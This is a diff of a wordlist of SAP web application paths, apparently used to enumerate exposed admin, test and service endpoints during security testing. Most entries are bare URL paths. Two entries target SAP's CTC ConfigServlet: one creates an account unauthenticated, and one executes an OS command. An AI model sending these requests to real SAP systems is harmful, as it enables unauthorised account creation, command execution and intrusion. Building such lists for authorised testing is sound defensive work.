 /sap/bc/webdynpro/sap/wdr_test_ui_elements
-/sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
 /sap/bc/webrfc
 /sap/bc/workflow/shortcut
 /sap/bc/xrfc
 /sap/bc/xrfc_test
-/sap/BSSP_SP_MAPS
 /sap/crm
 /sap/es/atk
 /sap/es/cockpit
@@ -347,16 +364,39 @@
 /sap/gw
 /sap/gw/bep
 /sap/gw/jsonrpc
-/SAPIKS
-/SAPIKS2
-/SAPIKS2/contentShow.sap
-/SAPIKS2/jsp/adminShow.jsp
-/SAPIrExtHelp
-/sap/IStest
-/sapmc/sapmc.html
 /sap/monitoring/
 /sap/public
+/sap/public/BusinessSuite
+/sap/public/BusinessSuite/BCV
+/sap/public/BusinessSuite/BSSP
+/sap/public/BusinessSuite/CBESH_ICONS
+/sap/public/BusinessSuite/CloCo
+/sap/public/BusinessSuite/TM
+/sap/public/BusinessSuite/TM/FlashIslands
+/sap/public/BusinessSuite/TM/Icons
+/sap/public/BusinessSuite/TM/Icons_rtl
+/sap/public/E2EALERT
+/sap/public/ES
+/sap/public/HRPDV
+/sap/public/HRPDV/Icons
+/sap/public/HRRenewal
+/sap/public/HRRenewal/PB
+/sap/public/LSOFE
+/sap/public/LSOFE/IconLarge
+/sap/public/LSOFE/IconLarge/CORBU
+/sap/public/LSOFE/IconLarge/TRADESHOW
+/sap/public/LSOFE/Pictogram
+/sap/public/LSOFE/Pictogram/CORBU
+/sap/public/LSOFE/Pictogram/TRADESHOW
+/sap/public/PPM
+/sap/public/PPM/PFM
+/sap/public/PPM/PFM/BCV
+/sap/public/PPM/PFM/UI
+/sap/public/PPM/PRO
 /sap/public/bc
+/sap/public/bc/AR_NEWS_REDRCT
+/sap/public/bc/NWDEMO_MODEL
+/sap/public/bc/NW_ESH_TST_AUTO
 /sap/public/bc/abap
 /sap/public/bc/abap/docu
 /sap/public/bc/abap/mime_demo
@@ -364,7 +404,6 @@
 /sap/public/bc/apc_test
 /sap/public/bc/apc_test/apc_tcp_test_sf
 /sap/public/bc/apc_test/apc_tcp_test_sl
-/sap/public/bc/AR_NEWS_REDRCT
 /sap/public/bc/bpo
 /sap/public/bc/bsp
 /sap/public/bc/clms
@@ -388,8 +427,6 @@
 /sap/public/bc/its/mobile/test
 /sap/public/bc/its/scripts
 /sap/public/bc/jsm
-/sap/public/bc/NWDEMO_MODEL
-/sap/public/bc/NW_ESH_TST_AUTO
 /sap/public/bc/pictograms
 /sap/public/bc/qgm
 /sap/public/bc/sec
@@ -410,13 +447,13 @@
 /sap/public/bc/ur
 /sap/public/bc/wdtracetool
 /sap/public/bc/webdynpro
-/sap/public/bc/webdynpro/adobechallenge
-/sap/public/bc/webdynpro/adobeChallenge
-/sap/public/bc/webdynpro/mimes
 /sap/public/bc/webdynpro/Polling
+/sap/public/bc/webdynpro/ViewDesigner
+/sap/public/bc/webdynpro/adobeChallenge
+/sap/public/bc/webdynpro/adobechallenge
+/sap/public/bc/webdynpro/mimes
 /sap/public/bc/webdynpro/ssr
 /sap/public/bc/webdynpro/viewdesigner
-/sap/public/bc/webdynpro/ViewDesigner
 /sap/public/bc/webicons
 /sap/public/bc/workflow
 /sap/public/bc/workflow/shortcut
@@ -424,31 +461,16 @@
 /sap/public/bsp/sap
 /sap/public/bsp/sap/htmlb
 /sap/public/bsp/sap/public
+/sap/public/bsp/sap/public/FAA
+/sap/public/bsp/sap/public/ISE
+/sap/public/bsp/sap/public/SEM
 /sap/public/bsp/sap/public/bc
 /sap/public/bsp/sap/public/faa
-/sap/public/bsp/sap/public/FAA
 /sap/public/bsp/sap/public/graphics
 /sap/public/bsp/sap/public/graphics/jnet_handler
 /sap/public/bsp/sap/public/graphics/mimes
-/sap/public/bsp/sap/public/ISE
-/sap/public/bsp/sap/public/SEM
 /sap/public/bsp/sap/system
 /sap/public/bsp/sap/system_public
-/sap/public/BusinessSuite
-/sap/public/BusinessSuite/BCV
-/sap/public/BusinessSuite/BSSP
-/sap/public/BusinessSuite/CBESH_ICONS
-/sap/public/BusinessSuite/CloCo
-/sap/public/BusinessSuite/TM
-/sap/public/BusinessSuite/TM/FlashIslands
-/sap/public/BusinessSuite/TM/Icons
-/sap/public/BusinessSuite/TM/Icons_rtl
-/sap/public/E2EALERT
-/sap/public/ES
-/sap/public/HRPDV
-/sap/public/HRPDV/Icons
-/sap/public/HRRenewal
-/sap/public/HRRenewal/PB
 /sap/public/icf_check
 /sap/public/icf_info
 /sap/public/icf_info/icr_groups
@@ -457,23 +479,14 @@
 /sap/public/icf_info/urlprefix
 /sap/public/icman
 /sap/public/icman/ping
+/sap/public/icmandir/its/kernel_version.info
+/sap/public/icmandir/last_update_ITS.txt
+/sap/public/icmandir/last_update_icmadmin.txt
 /sap/public/info
-/sap/public/LSOFE
-/sap/public/LSOFE/IconLarge
-/sap/public/LSOFE/IconLarge/CORBU
-/sap/public/LSOFE/IconLarge/TRADESHOW
-/sap/public/LSOFE/Pictogram
-/sap/public/LSOFE/Pictogram/CORBU
-/sap/public/LSOFE/Pictogram/TRADESHOW
 /sap/public/myssocntl
 /sap/public/opu
 /sap/public/opu/resources
 /sap/public/ping
-/sap/public/PPM
-/sap/public/PPM/PFM
-/sap/public/PPM/PFM/BCV
-/sap/public/PPM/PFM/UI
-/sap/public/PPM/PRO
 /sap/wdisp/admin
 /sap/wdvd
 /sap/webcuif
@@ -485,26 +498,20 @@
 /sap/webdynpro/sap/hrtmc_ta_assessment
 /sap/webdynpro/sap/hrtmc_ta_dashboard
 /sap/webdynpro/sap/wd_analyze_config_user
+/sapmc/sapmc.html
 /scripts/wgate
 /servlet/com.sap.admin.Critical.Actio
 /sim/
 /sim/config/testdata.jsp
 /sim/config/testerror.jsp
 /sim/index.html
-/SLDStart/plain
-/SLDStart/secure
 /socoview
 /socoview/flddisplay.asp
-/SQLtrace/index.html
 /sysconfig
-/tc/lm/webadmin/clusteradmin
 /tc.lm.webadmin.endtoend.public.app
+/tc/lm/webadmin/clusteradmin
 /teched/test
-/TestJDBC_Web
-/TOdbo
 /top.html
-/TSapq
-/TXmla
 /uddi/
 /uddiclient
 /uddiclient/jsps/index.jsp
@@ -512,7 +519,6 @@
 /useradmin
 /userhome
 /utl/UsageTypesInfo
-/VC
 /vscantest/
 /webdynpro/dispatcher
 /webdynpro/dispatcher/
@@ -530,14 +536,11 @@
 /webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP
 /webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
 /webdynpro/dispatcher/sap.com/tc~wd~tools
-/webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
 /webdynpro/dispatcher/sap.com/tc~wd~tools/WebDynproConsole
+/webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
 /webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator
 /webdynpro/resources/sap.com/
 /webdynpro/welcome/Welcome.jsp
-/WSConnector/Config1
-/WSConnector/Config1?wsdl
-/WSConnector/Config?wsdl
 /wsd2wsdl
 /wsnavigator
 /wsnavigator/jsps/index.jsp
@@ -547,3 +550,1084 @@
 /wssproc/cert
 /wssproc/plain
 /wssproc/ssl
+@download@
+ADS-EJB
+ADS-License
+AE/index.jsp
+Adobe
+AdobeDocumentServices/Config
+AdobeDocumentServices/Config?wsdl
+AdobeDocumentServices/Grmg
+AdobeDocumentServicesSec/Config
+ApplicationAdminProvider
+BI_UDC
+BizcCommLayerAuthoring/Config1
+BizcCommLayerAuthoring/Config1?wsdl
+BizcCommLayerUtilities/Config1
+CAFDataService/Config
+CAFDataService/Config?wsdl
+CMSRTS/Config1
+CMSRTS/Config1?wsdl
+DataArchivingService
+GRMGHeartBeat
+GRMGWSTest/service
+GRMGWSTest/service?wsdl
+IGSCustomizingXML
+IciActionItemService/IciActionItemConf
+IciActionItemService/IciActionItemConf?wsdl
+IciChatLineService/IciChatLineConf
+IciChatLineService/IciChatLineConf?wsdl
+IciChatSessionService/IciChatSessionConf
+IciContainerService/IciContainerConf
+IciEventService/
+IciEventService/IciEventConf
+IciEventService/IciEventConf?wsdl
+IciEventService/sap
+IciFolderService/IciFolderConf
+IciFolderService/IciFolderConf?wsdl
+IciItemService/IciItemConf
+IciItemService/IciItemConf?wsdl
+IciMessageService/IciMessageConf
+IciMessageService/IciMessageConf?wsdl
+IciMonitorService/IciMonitorConf
+IciMonitorService/IciMonitorConf?wsdl
+IciPhoneCallService/IciPhoneCallConf
+IciPhoneCallService/IciPhoneCallConf?wsdl
+IciPhoneLineService/IciPhoneLineConf
+IciSystemService/IciSystemConf
+IciSystemService/IciSystemConf?wsdl
+IciUserService/IciUserConf
+IciUserService/IciUserConf?wsdl
+KW
+Lighthammer
+Modeler
+OpenSQLMonitors
+OpenSQLMonitors/
+OpenSQLMonitors/index.html
+PerformacetraceTraceApplication
+RE/index.jsp
+SAPIKS
+SAPIKS2
+SAPIKS2/contentShow.sap
+SAPIKS2/jsp/adminShow.jsp
+SAPIrExtHelp
+SLDStart/plain
+SLDStart/secure
+SQLTrace
+SQLtrace/index.html
+TOdbo
+TSapq
+TXmla
+TestJDBC_Web
+VC
+WSConnector/Config1
+WSConnector/Config1?wsdl
+WSConnector/Config2
+_default
+apidocs/
+apidocs/allclasses-frame.html
+apidocs/com/sap/engine/connector/connection/IConnection.html
+apidocs/com/sap/engine/deploy/manager/Deploymanager.html
+apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
+apidocs/com/sap/engine/deploy/manager/LoginInfo.html
+bcb
+bcb/
+bcb/bcbadmHome.jsp
+bcb/bcbadmNavigation.jsp
+bcb/bcbadmSettings.jsp
+bcb/bcbadmStart.jsp
+bcb/bcbadmSystemInfo.jsp
+bcbtest
+bcbtest/start.jsp
+bwtest
+caf
+ccsui
+com~tc~lm~webadmin~httpprovider~web
+ctc
+ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla
+ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
+dispatcher
+dswsbobje
+dtr_lite
+ecatt
+entrypoints/recent
+examples
+examples.html
+examples/
+examples_frame.html
+exchangeProfile
+exchangeProfile/
+guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
+htmlb
+htmlb/
+htmlb/index.html
+index.html
+inspection.wsil
+ipcpricing/ui/
+irj
+irj/go/km/basicsearch
+irj/go/km/details
+irj/go/km/docs
+irj/go/km/docs/etc/public/mimes/images
+irj/go/km/docs/etc/xmlforms
+irj/go/km/docs/ume/users
+irj/go/km/highlightedcontent
+irj/go/km/navigation
+irj/go/km/navigation/
+irj/go/km/navigation/ume/users
+irj/portal
+irj/portalapps
+irj/portalapps/com.petsmart.portal.navigation.masthead.idle_logout
+irj/portalapps/com.sap.portal.design.portaldesigndata
+irj/portalapps/com.sap.portal.design.urdesigndata
+irj/portalapps/com.sap.portal.epcf.loader
+irj/portalapps/com.sap.portal.navigation.detailedtree
+irj/sdn/soa-discovery
+irj/servlet
+irj/servlet/prt
+irj/servlet/prt/portal
+irj/servlet/prt/portal/
+irj/servlet/prt/portal/prtroot
+irj/servlet/prt/portal/prtroot/PortalAnywhere.Go
+irj/servlet/prt/portal/prtroot/com.sap.km.cm.basicsearch
+irj/servlet/prt/portal/prtroot/com.sap.km.cm.docs -> webdav
+irj/servlet/prt/portal/prtroot/com.sap.km.cm.highlightedcontent
+irj/servlet/prt/portal/prtroot/com.sap.km.cm.navigation
+irj/servlet/prt/portal/prtroot/com.sap.km.cm.uidetails
+irj/servlet/prt/portal/prtroot/com.sap.km.home_ws
+irj/servlet/prt/portal/prtroot/com.sap.netweaver.kmc.people.PeopleDetails?Uri=/ume/users/USER.PRIVATE_DATASOURCE.un%253AAdministrator.usr
+irj/servlet/prt/portal/prtroot/com.sap.portal.dsm.terminator
+irj/servlet/prt/portal/prtroot/com.sap.portal.epcf.loader.wdscriptblockprovider
+irj/servlet/prt/portal/prtroot/pcd!(*)
+irj/servlet/prt/portal/prttarget/uidpwlogon/prteventname/performchangepassword
+lcrabapapi
+logon
+logon/index.jsp
+logon/logonServlet
+logon/logonServlet?redirectURL=%2FVC%2Fdefault.jsp
+logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
+main.html
+mbeanreg
+meSync
+meSync/HttpGRMGTest.html
+mmr
+mmr/
+modeller/
+modeller/index.html
+monitoring
+monitoringProvierRoot
+nwa
+performanceProvierRoot
+pmi
+portal
+portalapps
+rep/build_info.html
+rep/build_info.jsp
+rep/start/index.jsp
+run/build_info.html
+run/build_info.jsp
+rwb/version.html
+saml
+samlssodemo_dest
+samlssodemo_source
+sap
+sap/
+sap/IStest
+sap/admin
+sap/admin/default.html
+sap/admin/index.html
+sap/ap
+sap/bc
+sap/bc/
+sap/bc/BEx
+sap/bc/FormToRfc
+sap/bc/FormToRfc/soap
+sap/bc/IDoc_XML
+sap/bc/MIDSD
+sap/bc/MJC
+sap/bc/MJC/
+sap/bc/MJC/mi_host
+sap/bc/MJC/mi_mds
+sap/bc/MJC/mi_service
+sap/bc/MJC/mi_services
+sap/bc/MY_NEW_SERV99
+sap/bc/Mi_host_http
+sap/bc/Mime
+sap/bc/bsp
+sap/bc/bsp/
+sap/bc/bsp/esh_os_service/favicon.gif
+sap/bc/bsp/sap
+sap/bc/bsp/sap/
+sap/bc/bsp/sap/SXSLT_DEMO
+sap/bc/bsp/sap/absenceform_new
+sap/bc/bsp/sap/alertinbox
+sap/bc/bsp/sap/alertinboxwap
+sap/bc/bsp/sap/bexlogon
+sap/bc/bsp/sap/bkbtest
+sap/bc/bsp/sap/bkbtest_sch
+sap/bc/bsp/sap/brf_export_xml
+sap/bc/bsp/sap/brf_info
+sap/bc/bsp/sap/bsp_dlc_frcmp
+sap/bc/bsp/sap/bsp_model
+sap/bc/bsp/sap/bsp_veri
+sap/bc/bsp/sap/bsp_verificatio
+sap/bc/bsp/sap/bsp_vhelp
+sap/bc/bsp/sap/bsp_wd_base
+sap/bc/bsp/sap/bsp_wd_comp_spl
+sap/bc/bsp/sap/bsp_wd_compbase
+sap/bc/bsp/sap/bsp_wd_ddlb_spl
+sap/bc/bsp/sap/bsp_wd_tree_spl
+sap/bc/bsp/sap/bspwd_basics
+sap/bc/bsp/sap/bspwd_cmp_embed
+sap/bc/bsp/sap/bspwd_simple
+sap/bc/bsp/sap/btf_ext_demo
+sap/bc/bsp/sap/ccms_mc
+sap/bc/bsp/sap/certmap
+sap/bc/bsp/sap/certreq
+sap/bc/bsp/sap/crm_bm
+sap/bc/bsp/sap/crm_bsp_bab_dis
+sap/bc/bsp/sap/crm_bsp_bab_dss
+sap/bc/bsp/sap/crm_bsp_bab_exi
+sap/bc/bsp/sap/crm_bsp_bab_fra
+sap/bc/bsp/sap/crm_bsp_bab_pan
+sap/bc/bsp/sap/crm_bsp_f1_help
+sap/bc/bsp/sap/crm_bsp_f4_help
+sap/bc/bsp/sap/crm_bsp_face
+sap/bc/bsp/sap/crm_bsp_frame
+sap/bc/bsp/sap/crm_bsp_listper
+sap/bc/bsp/sap/crm_bsp_lst_prt
+sap/bc/bsp/sap/crm_bsp_xbab_fr
+sap/bc/bsp/sap/crm_bsp_xbab_pa
+sap/bc/bsp/sap/crm_ei_cmp_admn
+sap/bc/bsp/sap/crm_ic_check
+sap/bc/bsp/sap/crm_ic_ise
+sap/bc/bsp/sap/crm_ic_ise/editor
+sap/bc/bsp/sap/crm_ic_mcm
+sap/bc/bsp/sap/crm_ic_preview
+sap/bc/bsp/sap/crm_ic_xmledit
+sap/bc/bsp/sap/crm_ici_tst_cat
+sap/bc/bsp/sap/crm_ml_preview
+sap/bc/bsp/sap/crm_preview
+sap/bc/bsp/sap/crm_prt_url_dis
+sap/bc/bsp/sap/crm_thtmlb_util
+sap/bc/bsp/sap/crm_ui_frame
+sap/bc/bsp/sap/crm_ui_start
+sap/bc/bsp/sap/crm_xml_test
+sap/bc/bsp/sap/crmcmp_bpident/
+sap/bc/bsp/sap/crmcmp_brfcase
+sap/bc/bsp/sap/crmcmp_hdr
+sap/bc/bsp/sap/crmcmp_hdr_std
+sap/bc/bsp/sap/crmcmp_ic_frame
+sap/bc/bsp/sap/decode_url
+sap/bc/bsp/sap/ecteched
+sap/bc/bsp/sap/esh_sap_link
+sap/bc/bsp/sap/esh_sapgui_exe
+sap/bc/bsp/sap/frontend_print
+sap/bc/bsp/sap/graph_bsp_test
+sap/bc/bsp/sap/graph_bsp_test/Mimes
+sap/bc/bsp/sap/graph_tut_chart
+sap/bc/bsp/sap/graph_tut_chart/Mimes
+sap/bc/bsp/sap/graph_tut_jnet
+sap/bc/bsp/sap/graph_tut_jnet/Mimes
+sap/bc/bsp/sap/graph_tutorials
+sap/bc/bsp/sap/graph_tutorials/mimes
+sap/bc/bsp/sap/gsbirp
+sap/bc/bsp/sap/hap_document
+sap/bc/bsp/sap/hap_q_profile
+sap/bc/bsp/sap/hr_expert
+sap/bc/bsp/sap/htmlb_samples
+sap/bc/bsp/sap/ic_base
+sap/bc/bsp/sap/ic_frw_notify
+sap/bc/bsp/sap/iccmp_bp_cnfirm
+sap/bc/bsp/sap/iccmp_hdr_cntnr
+sap/bc/bsp/sap/iccmp_hdr_cntnt
+sap/bc/bsp/sap/iccmp_header
+sap/bc/bsp/sap/iccmp_ssc_ll/
+sap/bc/bsp/sap/icf
+sap/bc/bsp/sap/icf_notify_poll
+sap/bc/bsp/sap/icfrecorder
+sap/bc/bsp/sap/icm
+sap/bc/bsp/sap/it00
+sap/bc/bsp/sap/it01
+sap/bc/bsp/sap/it02
+sap/bc/bsp/sap/it03
+sap/bc/bsp/sap/it04
+sap/bc/bsp/sap/it05
+sap/bc/bsp/sap/itsm
+sap/bc/bsp/sap/me_fw_install
+sap/bc/bsp/sap/merep_app_meta
+sap/bc/bsp/sap/ppm
+sap/bc/bsp/sap/ppm_detail
+sap/bc/bsp/sap/public
+sap/bc/bsp/sap/public/
+sap/bc/bsp/sap/public/FormGraphics
+sap/bc/bsp/sap/public/bc
+sap/bc/bsp/sap/public/graphics
+sap/bc/bsp/sap/rmpspb_case
+sap/bc/bsp/sap/rmpspb_casenote
+sap/bc/bsp/sap/rsrthemes_iview
+sap/bc/bsp/sap/sam_demo
+sap/bc/bsp/sap/sam_notifying
+sap/bc/bsp/sap/sam_sess_queue
+sap/bc/bsp/sap/sapsign
+sap/bc/bsp/sap/sapterm
+sap/bc/bsp/sap/sbsp_dal_demo
+sap/bc/bsp/sap/sbspext_bsp
+sap/bc/bsp/sap/sbspext_htmlb
+sap/bc/bsp/sap/sbspext_phtmlb
+sap/bc/bsp/sap/sbspext_table
+sap/bc/bsp/sap/sbspext_xhtmlb
+sap/bc/bsp/sap/scpbspconvertuc
+sap/bc/bsp/sap/sem_upwb
+sap/bc/bsp/sap/sf_webform_01
+sap/bc/bsp/sap/sf_webform_02
+sap/bc/bsp/sap/sf_webform_03
+sap/bc/bsp/sap/sf_webform_04
+sap/bc/bsp/sap/sfint_demo01
+sap/bc/bsp/sap/sfint_demo02
+sap/bc/bsp/sap/sfint_demo03
+sap/bc/bsp/sap/sfint_demo04
+sap/bc/bsp/sap/sicf_login_test
+sap/bc/bsp/sap/sicf_login_test/
+sap/bc/bsp/sap/sicf_login_test/test
+sap/bc/bsp/sap/sicf_login_test/testNoRedirect
+sap/bc/bsp/sap/smart_forms
+sap/bc/bsp/sap/spi_admin
+sap/bc/bsp/sap/spi_monitor
+sap/bc/bsp/sap/spi_procmonitor
+sap/bc/bsp/sap/srm_demo_bspext
+sap/bc/bsp/sap/srm_demo_note
+sap/bc/bsp/sap/srm_demo_record
+sap/bc/bsp/sap/srm_doc_test
+sap/bc/bsp/sap/srm_gensp_query
+sap/bc/bsp/sap/srm_note
+sap/bc/bsp/sap/srm_prop
+sap/bc/bsp/sap/srm_record
+sap/bc/bsp/sap/srmclfrm
+sap/bc/bsp/sap/srmps_browser
+sap/bc/bsp/sap/srmps_favorites
+sap/bc/bsp/sap/srmps_history
+sap/bc/bsp/sap/srmps_metadata
+sap/bc/bsp/sap/srmps_search
+sap/bc/bsp/sap/srt_browser
+sap/bc/bsp/sap/ssf_techinf
+sap/bc/bsp/sap/ssfdemodigsig
+sap/bc/bsp/sap/ssfdemodigsig2
+sap/bc/bsp/sap/swfmod_portal
+sap/bc/bsp/sap/swh_demo_calc
+sap/bc/bsp/sap/swn_config
+sap/bc/bsp/sap/swn_message1
+sap/bc/bsp/sap/swn_wiexecute
+sap/bc/bsp/sap/swxtraagent
+sap/bc/bsp/sap/swxtrareq
+sap/bc/bsp/sap/sxidemo_agcy_ui
+sap/bc/bsp/sap/sxms_alertrules
+sap/bc/bsp/sap/sxslt_training
+sap/bc/bsp/sap/system
+sap/bc/bsp/sap/system640
+sap/bc/bsp/sap/system_priv_01
+sap/bc/bsp/sap/system_priv_02
+sap/bc/bsp/sap/system_priv_03
+sap/bc/bsp/sap/system_private
+sap/bc/bsp/sap/system_public
+sap/bc/bsp/sap/system_test
+sap/bc/bsp/sap/t_sam_demo
+sap/bc/bsp/sap/thtmlb_scripts
+sap/bc/bsp/sap/thtmlb_styles
+sap/bc/bsp/sap/tunguska
+sap/bc/bsp/sap/tunguska_detail
+sap/bc/bsp/sap/tutorial_1
+sap/bc/bsp/sap/tutorial_2
+sap/bc/bsp/sap/tutorial_2htmlb
+sap/bc/bsp/sap/tutorial_3
+sap/bc/bsp/sap/tutorial_3_mvc
+sap/bc/bsp/sap/tutorial_4
+sap/bc/bsp/sap/tutorial_4_mvc
+sap/bc/bsp/sap/tutorial_cache
+sap/bc/bsp/sap/uddiclientfind
+sap/bc/bsp/sap/uddiclpublish
+sap/bc/bsp/sap/uicmp_ltx
+sap/bc/bsp/sap/upwb_sem
+sap/bc/bsp/sap/upwb_test_otr
+sap/bc/bsp/sap/upx_exec
+sap/bc/bsp/sap/upx_exec2
+sap/bc/bsp/sap/uws_form_servic
+sap/bc/bsp/sap/wap_push
+sap/bc/bsp/sap/webdynprodemos
+sap/bc/bsp/sap/wp_sess_test2
+sap/bc/bsp/sap/wscb
+sap/bc/bsp/sap/wsi_oci_bsp
+sap/bc/bsp/sap/wsi_oci_bsp_mvc
+sap/bc/bsp/sap/xi_pf_perf_moni
+sap/bc/bsp/sap/xi_pf_test
+sap/bc/bsp/sap/xmb_bsp_log
+sap/bc/bsp/scmb
+sap/bc/bsp/scmb/df_web2
+sap/bc/bsp_dev
+sap/bc/bw_test
+sap/bc/cachetest
+sap/bc/ccms
+sap/bc/ccms/
+sap/bc/ccms//Specto
+sap/bc/ccms/MarketSet
+sap/bc/ccms/monitoring
+sap/bc/ccms/monitoring/GRMG_APP
+sap/bc/ccms/monitoringCCMS_XML
+sap/bc/ce_url
+sap/bc/cimom
+sap/bc/cms
+sap/bc/contentserver
+sap/bc/crm_bsp_dl
+sap/bc/dal
+sap/bc/dal/demoB
+sap/bc/daldemoA
+sap/bc/doc
+sap/bc/doc/
+sap/bc/doc/browser
+sap/bc/doc/mast
+sap/bc/doc/meta
+sap/bc/doc/metadata
+sap/bc/doc/tmpl
+sap/bc/doc/tran
+sap/bc/docu
+sap/bc/dr
+sap/bc/ecatt
+sap/bc/ecatt/
+sap/bc/ecatt/ecatt_recorder
+sap/bc/ecatt/ecattping
+sap/bc/ecatt/log_provider
+sap/bc/echo
+sap/bc/echo/
+sap/bc/echo/logon
+sap/bc/echo/logon_base64
+sap/bc/echo/redirect
+sap/bc/error
+sap/bc/error/
+sap/bc/error/list
+sap/bc/error/template
+sap/bc/error/webgui
+sap/bc/esf
+sap/bc/formabsdelete
+sap/bc/fp
+sap/bc/fpads
+sap/bc/generate
+sap/bc/generate/poll
+sap/bc/graphics
+sap/bc/graphics/net
+sap/bc/gui
+sap/bc/gui/its
+sap/bc/gui/sap
+sap/bc/gui/sap/its/
+sap/bc/gui/sap/its/BWSP
+sap/bc/gui/sap/its/BWWF_WI_DECI
+sap/bc/gui/sap/its/BWWI_EXECUTE
+sap/bc/gui/sap/its/CCMS_APPSRVLIS
+sap/bc/gui/sap/its/CCMS_DBBUFARCH
+sap/bc/gui/sap/its/CERTMAP
+sap/bc/gui/sap/its/CERTREQ
+sap/bc/gui/sap/its/CRM_CIC_RABOX
+sap/bc/gui/sap/its/GRM_WRAPPER
+sap/bc/gui/sap/its/MININOTES
+sap/bc/gui/sap/its/MY_PROFILEMATC
+sap/bc/gui/sap/its/RSAU_STATUS
+sap/bc/gui/sap/its/SAPSIGN
+sap/bc/gui/sap/its/SAP_GENERATE
+sap/bc/gui/sap/its/SSFIDEMODIGSIG
+sap/bc/gui/sap/its/STATUSPANEL
+sap/bc/gui/sap/its/STERM_ITS
+sap/bc/gui/sap/its/TEST_XMLPARSER
+sap/bc/gui/sap/its/WSI_OCI_ITS
+sap/bc/gui/sap/its/XML_DTD_01
+sap/bc/gui/sap/its/alinkviewer
+sap/bc/gui/sap/its/bwca
+sap/bc/gui/sap/its/designs
+sap/bc/gui/sap/its/my_qualis
+sap/bc/gui/sap/its/my_requirement
+sap/bc/gui/sap/its/sample
+sap/bc/gui/sap/its/sample/
+sap/bc/gui/sap/its/sample/IAC_CALENDAR
+sap/bc/gui/sap/its/sample/IAC_FLIGHT
+sap/bc/gui/sap/its/sample/IAC_INPUT
+sap/bc/gui/sap/its/sample/IAC_SE38
+sap/bc/gui/sap/its/sample/IAC_TABLE
+sap/bc/gui/sap/its/sample/IAC_TEXTEDIT
+sap/bc/gui/sap/its/sample/IAC_TOOLBAR
+sap/bc/gui/sap/its/sample/IAC_TREE1
+sap/bc/gui/sap/its/sample/IAC_TREE2
+sap/bc/gui/sap/its/sample/iAC_HTML
+sap/bc/gui/sap/its/test
+sap/bc/gui/sap/its/test/
+sap/bc/gui/sap/its/test/it
+sap/bc/gui/sap/its/test/it/
+sap/bc/gui/sap/its/test/it/IT12
+sap/bc/gui/sap/its/test/it/IT13
+sap/bc/gui/sap/its/test/it/ITRBX
+sap/bc/gui/sap/its/test/it/it00
+sap/bc/gui/sap/its/test/it/it19
+sap/bc/gui/sap/its/test/webgui_end
+sap/bc/gui/sap/its/test/webgui_tj
+sap/bc/gui/sap/its/test/webgui_txend
+sap/bc/gui/sap/its/webgui
+sap/bc/gui/sap/its/webgui/!
+sap/bc/icf
+sap/bc/icf/
+sap/bc/icf/demo
+sap/bc/icf/demo/example_1
+sap/bc/icf/recorder
+sap/bc/icf/verification
+sap/bc/icman
+sap/bc/icman/test01
+sap/bc/idoc_xml
+sap/bc/igs_data
+sap/bc/kw
+sap/bc/kw/
+sap/bc/kw/K/Link
+sap/bc/kw/fs
+sap/bc/kw/mime
+sap/bc/kw/skwr
+sap/bc/mlt
+sap/bc/mlt/
+sap/bc/mlt//vb
+sap/bc/mlt/slim
+sap/bc/mlt/slim/
+sap/bc/mlt/slim//lang_plus
+sap/bc/mlt/slim/branching
+sap/bc/mlt/slim/pcx
+sap/bc/mlt/slim/pcx_plus
+sap/bc/mlt/test
+sap/bc/mlt/tmware
+sap/bc/mlt/trados
+sap/bc/notify
+sap/bc/notify/polling
+sap/bc/ping
+sap/bc/print
+sap/bc/rehm
+sap/bc/report
+sap/bc/sapits_mimes
+sap/bc/smart_forms
+sap/bc/soap
+sap/bc/soap/
+sap/bc/soap/doc
+sap/bc/soap/ici
+sap/bc/soap/ici_ssl
+sap/bc/soap/rfc
+sap/bc/soap/wsdl
+sap/bc/soap/wsdl11
+sap/bc/soap/wsdlservices
+sap/bc/spi_gate
+sap/bc/srm
+sap/bc/srm/rcm_webdav
+sap/bc/srm/rcm_webdav/
+sap/bc/srm/rcm_webdav/s_area_cmg
+sap/bc/srm/rcm_webdav/s_area_rms
+sap/bc/srt
+sap/bc/srt/
+sap/bc/srt/IDoc
+sap/bc/srt/esf
+sap/bc/srt/rfc
+sap/bc/srt/rfc/
+sap/bc/srt/rfc/OSP
+sap/bc/srt/rfc/sap
+sap/bc/srt/sap/
+sap/bc/srt/sap/Detailed_flight_info_get
+sap/bc/srt/sap/ER_REGISTRY_SUPPORT_SERVICE
+sap/bc/srt/sap/II_TEST_IN_SYNC
+sap/bc/srt/sap/ME_RT_DSD_WS_64
+sap/bc/srt/sap/QUERY_VIEW_DATA
+sap/bc/srt/sap/RSDAW_NEARLINE_SERVER
+sap/bc/srt/sap/RSOBJSALTERNODEREFS
+sap/bc/srt/sap/RSOBJS_ALTER_NODE_REFS
+sap/bc/srt/sap/RSOBJS_CHECK
+sap/bc/srt/sap/RSOBJS_DELETE
+sap/bc/srt/sap/RSOBJS_GET_NODES
+sap/bc/srt/sap/RSOBJS_INIT
+sap/bc/srt/sap/RSOBJS_WHERE_USED_LIST
+sap/bc/srt/sap/RSPO_SXOMS_DEFINE_PRINTER
+sap/bc/srt/sap/RSPO_SXOMS_DELETE_PRINTER
+sap/bc/srt/sap/RSPO_SXOMS_GET_DEVICE_TYPES
+sap/bc/srt/sap/RSPO_SXOMS_GET_TRAY_INFO
+sap/bc/srt/sap/RSPO_SXOMS_PUSH_ROMS_LOMS
+sap/bc/srt/sap/RSPO_SXOMS_UPDATE_PRINTER
+sap/bc/srt/sap/SAP_RPE_SEQUENCE
+sap/bc/srt/sap/SBIZC_AUTHOR
+sap/bc/srt/sap/SBIZC_AUTHORING
+sap/bc/srt/sap/SBIZC_DETAIL
+sap/bc/srt/sap/SBIZC_TEST_AUTHOR_INIT
+sap/bc/srt/sap/SBIZC_WS_TEST
+sap/bc/srt/sap/SRTFT_MASS_CONFIGURATION
+sap/bc/srt/sap/SRTFT_SYSTEM_METADATA_ACCESS
